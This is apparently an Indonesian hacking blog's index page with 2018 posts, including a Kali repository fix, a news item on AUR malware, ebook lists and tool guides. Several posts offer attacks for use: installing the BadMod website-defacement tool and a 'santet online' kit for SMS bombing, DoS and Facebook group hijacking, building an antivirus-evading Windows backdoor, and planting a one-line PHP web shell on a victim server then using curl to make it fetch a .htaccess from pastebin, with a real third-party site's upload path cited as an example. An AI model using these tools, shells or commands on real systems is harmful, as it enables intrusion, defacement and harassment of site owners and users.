News Ticker

Latest Posts

Fix Repository Kali Linux Rolling 2018

- Tuesday, July 17, 2018 1 Comment

Fix Repository Kali Linux Rolling 2018

Fix Repository Kali Linux Rolling 2018

Makin sini developer Kali Linux OS terus menerus melakukan perkembangan terhadap OS Kali Linux in, dari segi interfaces, penambahan & pengurangan tools, dan tidak lepas juga dengan repositori-nya.

Berbicara mengenai reporsitory, saya melihat ada masalah tentang repository yang tidak berjalan/tidak berfungsi, khususnya semenjak ada versi Kali linux terbaru yaitu 2018.1 (dan sekarang ada yang 2018.2).




Berikut pembeberan masalahnya :

Disini saya menggunakan Kali linux 2018.2, dan menggunakan Repo default (bawaan) :
deb http://http.kali.org/kali kali-rolling main contrib non-free
# For source package access, uncomment the following line
# deb-src http://http.kali.org/kali kali-rolling main contrib non-free
Dan akan mencoba untulk menginstall figlet, berikut hasilnya :


OK, disana kita dapat lihat bahwa ada instruksi untuk melakukan update, lihat apa yang terjadi :


Tetep Error....

Ok langsung saja kita ke fixing masalahnya :


Sederhana saja, kita hanya mengetikkan 1 Huruf saja di 2 baris repository kita nanti, yha hanya 1 huruf, sebagai berikut :

Buka dulu file sources.list nya, bisa menggunakan nano, vim, leafpad, gedit, dll.

nano /etc/apt/sources.list

Yang awalnya :
deb http://http.kali.org/kali kali-rolling main contrib non-free
# For source package access, uncomment the following line
# deb-src http://http.kali.org/kali kali-rolling main contrib non-free

Kita ubah menjadi :
deb https://http.kali.org/kali kali-rolling main contrib non-free
# For source package access, uncomment the following line
# deb-src https://http.kali.org/kali kali-rolling main contrib non-free

1 huruf yang dimaksud adalah ditempatkan dibagian http , maka jadi https .
 Ok kita coba lakukan update...

apt-get update

and Sukses


Dengan begitu, install package apapun yang tersedia di Repository tersebut kembali bisa seperti sebelumnya :D
Simpel :D

Sekian saja postingan ini, jika berkenan memberikan donasi, anda bisa nganuin ikl@an  yang terpasang di blog ini :'D  >>>>>>




Terima Kasih

How To Hack Website Easily

- Sunday, July 15, 2018 No Comments
How To Deface Website Easily With Termux

You want to deface a website but do not have any language programming skills?

Don't worry. You can deface website easily using termux with BadMod tool.

BadMod auto exploit tool V2


How To Deface Website Easily With Termux

- Vulnerabilties Scanner
- Dorking
- Cms Detector
- Auto Exploit : 

Installation

$ pkg update && update 
$ pkg install git php curl nano 
$ git clone https://github.com/MrSqar-Ye/BadMod 
$ cd BadMod 
$ nano BadMod.php

Delete this code, see the image

to be, see the image

And save, press ctrl+x and type Y, hit the enter

Run the tools using command :
$ php BadMod.php
Choose the number whatever you want

If you want to dorking use this command :



$ php Dorker.php
sumber :  http://www.termux-tutorial.ga/2018/07/how-to-deface-website-easily-with-termux.html

Malware found in Arch Linux AUR Repository

- No Comments

Malware has been discovered in at least three Arch Linux packages available on AUR (Arch User Repository), the official Arch Linux repository of user-submitted packages. The malicious code was immediately removed when the AUR team intervened. The incident occurred because the AUR team allow users to contribute to repositories that have been abandoned by their original authors.

The repository has user-submitted packages, and that is how the malware was released in the repository. A user named “xeactor” took over an ‘orphaned’ package on Saturday going by the name of “acroread” which functions as a PDF viewer and added a malicious code.

As per Git commit, “Xeactor” added a code that would download a script named “~x” from ptpb.pw a lightweight package that allows users to share tiny pieces of text files, which in turn would execute another file named “~u”. The software meddles with “systemd” and reconfigure it. This script would run every 360 seconds.

The purpose of the second file (~u) was to collect data about each infected system including date, time, machine’s ID, package manager details, CPU information and outputs of “uname-a” and “systemctl list-units” commands and post these details inside a new Pastebin file, using the attacker's custom Pastebin API key.

The AUR team have also said they have found similar code in other packages:

▬ acroread 9.5.5-8

▬ balz 1.20-3

▬ minergate 8.1-2

The malicious code changes were reversed and xeactor’s accounts were suspended. The AUR packages are user-submitted packages to the Arch Linux Repo. There are a lot of cases this year where most of the code of the operating system has been affected by some sort of malware.

No other malicious actions were observed, meaning the acroread package wasn't harming users' systems, but merely collecting data in preparation for... something else.

Even though it does not pose any serious threat to the infected computers, it is anticipated that “xeactor” could launch another malware as any self-update mechanism was not included.

Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security 2

- Saturday, July 14, 2018 1 Comment

Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 2




Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 2 akhirnya saya post :D dan yang pasti masih berhubungan dengan judul yang saya cantumkan diatas yha :D.

Link Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 2 :


https://www.maxteroit.com/2018/07/kumpulan-ebook-hacking-programming-networking-blogging-security.html

Seperti biasa, pemanis....

(Google Haking For Penetration Testing - 529 Pages)



(Metasploit Penetration Testing Cookbook - 269 Pages)



Oke berikut list Ebook Koleksi babang Maxteroit Part 2 :


2. Google Secrets - How To Get A Top 10 Ranking - 112 Pages

3. Gray Hat Hacking - 721 Pages

4. Metasploit The Penetration Testers Guide - 332 Pages

5. Nmap 6_ Network Exploration and Security Auditing Cookbook - 318 Pages

6. Nmap Essentials - 118 Pages

7. nmap-cookbook-the-fat-free-guide-to-network-scanning - 198 Pages

8. Penetration Testing with the Bash shell - 151 Pages

9. PHP for Absolute Beginners, 2nd Edition - 236 Pages

10. Practical Malware Analysis - 802 Pages

11. Practical Reverse Engineering - 383 Pages

12. The Art of Memory Forensics - 914 Pages

13. Windows Sysinternals Administrators Reference - 497 Pages

14. windows-command-line-administration - 578 Pages


Nah Mungkin baru segitu dulu saja koleksi Ebook saya yang bisa share dipost ini..
Dan di post selanjutnya, saya akan share Ebook mengenai Ethical Hacking
Jangan sungkan untuk bertanya atau meminta sesuatu pada saya :D , sobat bisa hubungi saya ke email === > adittya@maxteroit.com
Terima Kasih  

Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security 1

- Monday, July 9, 2018 1 Comment

Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 1



Ebook mengenai Hacking, Programming, Networking & Security sudah bertebaran di Internet, yap seperti di Blog Ini :D Maxteroit tercinta. Berhubungan banyak yang request mengenai Upload Ebook-ebook yang saya punya :'D  (permintaan dari teman FB) , dengan begitu saya dengan senang hati share koleksi-koleksi ebook yang saya punya, berikut screenshotnya :

(GrayHat Hacking-721 pages)


(Practical Reverse Engineering-383 pages)


Nah itu baru secuil aj :D, 
Berikut Nama sekaligus Linknya :














Penasaran dengan 2 Sampel diatas bukan ? 
tunggu di update-an selanjutnya yha, jgn lupa subscribe, atau jika ingin minta langsung, bisa hubungi saya via email =====> adittya@maxteroit.com

Untuk part 1, segitu dulu yha :'p
thx

Cara Santet Online Paling Ampuh

- Sunday, July 8, 2018 No Comments

Cara Santet Online Paling Ampuh


Cara Santet Online


Pada artikel kali ini saya akan memberikan tutorial cara install tools santet online di termux, Tools santet online ini adalah tools yang di buat oleh akun github Gameye98. Tools ini dbuat untuk berbagai macam keperluan seperti berikut:
- Create a Netcat Payload and Listener
- Facebook Group Hijack Attack
- SMS Bomber Attack Vectors
- SMS Spoof Attack Vectors
- Denial-of-Service Attack

  • Update dan upgrade termux dengan perintah
  • $ apt update && upgrade
  • Karena tools Santet Online ini menggunakan bahas pemrograman python, maka kalian harus mengintall python terlebih dahulu
  • $ apt istall python2
  • Install juga git dengan perintah
  • $ apt install git
  • Selanjutnya kalian tinggal mengclone tools nya dari github dengan perintah
  • $ git clone https://github.com/Gameye98/santet-online
  • Tunggu sampai proses cloning selesai, Kemudian masuk ke directory Santet Online
  • $ cd santet-online
  • Sekarang kalian tinggal menjalankan tools nya dengan perintah berikut
  • $ python2 santet.py
  • Ada lima pilihan dari 01-05, kalian tinggal memilih yang mana yang akan kalian gunakan
Sekian tutorial cara install tools santet online di termux, Terima kasih telah berkunjung di blog Android Tutorialku.
Jika kalian mengalami kendala silahkan bertanya di kolom komentar.
Selamat mencoba dan Semoga bermanfaat.....

SUMBER : http://www.termux-tutorial.ga/2018/07/cara-santet-online.html


Hack Windows 10 (Bypass Antivirus) Using Zirikatu (FUD)

- Saturday, April 14, 2018 2 Comments

Hack Windows 10 (Bypass Antivirus) Using Zirikatu (FUD)


Jika sebelumnya saya bahas hack windows  dengan msfvenom biasa (tanpa bantuan apapun, tapi kali ini saya akan share tutorial bagaimana Hack Windows 10 (Bypass Antivirus) Using Zirikatu (FUD).

Baca Juga :
Cara Membuat Backdoor Fud Menggunakan Veil-Evasion
Hack Windows Beda Jaringan Menggunakan Metasploit 

Oke langsung saja ke tutorial utamanya, cekidot.....

Download terlebih dahulu zirikatunya di github, bisa clone, bisa juga didownload langsung (dalam format zip) di link berikut
https://github.com/pasahitz/zirikatu

Jika sudah didownload, silahkan ekstrak file zirikatunya tadi, lalu buka folder yg sudah diekstrak menggunakan terminal, seperti berikut.....


Lalu jalankan tool Zirikatunya :


Disana terdapat beberapa pilihan, bisa kalian coba-coba sendiri, disini saya memilih pilihan yang nomor 3, yaitu Meterpreter_Reverse_https

Selanjutnya :
Set LHOST-nya, karena disini hanya jangkauan lokal, kita gunakan ip lokal kita, bisa dilihat dengan menggunakan perintah
ifconfig

Lalu set LPORT kita, kalian bisa set bebas berapapun angkanya, (karna lokal).
Untuk langkah  selanjutnya, bisa menyesuaikan....


Nah disana ada pertanyaan blablabla, kita yes kan saja, agar langsung masuk ke msfconsole dan si Zirikatunya sendiri sudah men-set sesuai dengan payload yang sudah kita buat, kita hanya tinggal menjalankan backdoornya di OS korban :D

Ok kita jalankan backdoornya..

(Sebelum Backdoor dieksekusi)

(Sesudah Dieksekusi).

Untuk lebih jelasnya, bisa disimak langsung lewat video berikut :

link =====> https://www.youtube.com/watch?v=i8cInI46fRQ



Ok sekian saja tutor saya :D ,
ouh iyha, untuk yang beda jaringan-nya akan menyusul, masih banyak tugas kuliah xixixixi.

Akses Shell, Bukan Download!

- Friday, March 30, 2018 5 Comments

Akses Shell, Bukan Download! - Shell Backdoor dalam computer security system ,merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya).

Salah satu cara mananamkan shell backdoor pada server adalah dengan metode  JQuery File Upload, tapi pernahkah kalian melakukan cara ini namun saat meng-akses shell, shell backdoor kalian malah ter-download? Oke, kita bahas solusinya.


  • .htaccess
Salah satu penyebab shell malah ter-download adalah htaccess. Apa itu htaccess? .htaccess adalah file untuk merubah beberapa konfigurasi untuk mengarahkan pada web server Apache.

AddType application/octet-stream .php

Lalu bagaimana solusinya? Solusinya adalah me-replace htaccess server dengan htaccess kita sendiri.

Bagaimana caranya??

  • 1. Siapkan file .php berisi script berikut,
<?php passthru($_POST['cmd']); __halt_compiler(); ?>
  • 2. Upload ke server korban.
  • 3. Buka termninal, ketikkan perintah,
curl -d cmd="wget https://pastebin.com/raw/ttPzvDjQ -O .htaccess" urlshell
contoh:
curl -d cmd="wget https://pastebin.com/raw/ttPzvDjQ -O .htaccess" http://maxteroit.com/shell.php


  • 4. Upload shell dengan format .berandal > contoh: shell.berandal
Contoh hasil upload:  
https://www.hicinko.com/cruisecms/public/uploadcontent/server/php/files//kecil.berandal

Penutup,
Semua artikel yang dimuat Maxteroit, hanya untuk pembelajaran saja, penggunaan untuk melanggar hukum diluar tanggung jawab Maxteroit. Jika ada kurang jelas atau ada yang ditanyakan, tinggal kan di kolom komentar.

Terima Kasih,
Berandal. 

Berkenalan Dengan Metasploit Web Crawler

- Sunday, March 11, 2018 No Comments

Berkenalan Dengan Metasploit Web Crawler. - Apa itu Metasploit? Metasploit framework adalah sebuah penetration tool yang cukup powerfull untuk melakukan penestrasi kedalam sebuah system. Aplikasi ini bisa untuk penetration testing ke System Windows, Unix/Linux, dan MacOs, tapi yang lebih cenderung Exploitable adalah Windows SP1.

Baca Juga: Apa Itu Metasploit Dan Pengertian Beserta Fungsinya.

Auxiliary Module, Modul ini adalah perayap web modular, untuk digunakan bersamaan dengan wmap (suatu hari nanti) atau mandiri.

Module Options, Untuk menampilkan pilihan yang tersedia, muat modul di dalam konsol Metasploit dan jalankan perintah 'show options' atau 'show advanced'.

msf > use auxiliary/crawler/msfcrawler
msf auxiliary(msfcrawler) > show actions
...actions...
msf auxiliary(msfcrawler) > set ACTION
msf auxiliary(msfcrawler) > show options
...show and set options...
msf auxiliary(msfcrawler) > run

Cara Crawling Web Menggunakan Metasploit Web Crawler,
use auxiliary/crawler/msfcrawler
msf auxiliary(msfcrawler) > set rhosts www.example.com
msf auxiliary(msfcrawler) > exploit

Penutup,
Semua artikel yang dimuat Maxteroit, hanya untuk pembelajaran saja, penggunaan untuk melanggar hukum diluar tanggung jawab Maxteroit. Sekian pembahasan tentang Metasploit Web Crawler, jika ada kurang jelas atau ada yang ditanyakan, tinggal kan di kolom komentar.

Terima Kasih,
Berandal.

XSSSNIPER

- Wednesday, January 31, 2018 1 Comment

XSSSNIPER is an handy xss discovery tool with mass scanning functionalities.

Usage:
Usage: xsssniper.py [options]

Options:
  -h, --help            show this help message and exit
  -u URL, --url=URL     target URL
  --post                try a post request to target url
  --data=POST_DATA      post data to use
  --threads=THREADS     number of threads
  --http-proxy=HTTP_PROXY
                        scan behind given proxy (format: 127.0.0.1:80)
  --tor                 scan behind default Tor
  --crawl               crawl target url for other links to test
  --forms               crawl target url looking for forms to test
  --user-agent=USER_AGENT
                        provide an user agent
  --random-agent        perform scan with random user agents
  --cookie=COOKIE       use a cookie to perform scans
  --dom                 basic heuristic to detect dom xss

Examples:
Scanning a single url with GET params:
$ python xsssniper.py -u "http://target.com/index.php?page=test"
Scanning a single url with POST params:
$ python xsssniper.py -u "http://target.com/index.php" --post --data=POST_DATA
Crawl a single url looking for forms to scan:
$ python xsssniper.py -u "http://target.com" --forms
Mass scan an entire website:
$ python xsssniper.py -u "http://target.com" --crawl
Mass scan an entire website forms included:
$ python xsssniper.py -u "http://target.com" --crawl --forms
Analyze target page javascripts (embedded and linked) to search for common sinks and sources:
$ python xsssniper.py -u "http://target.com" --dom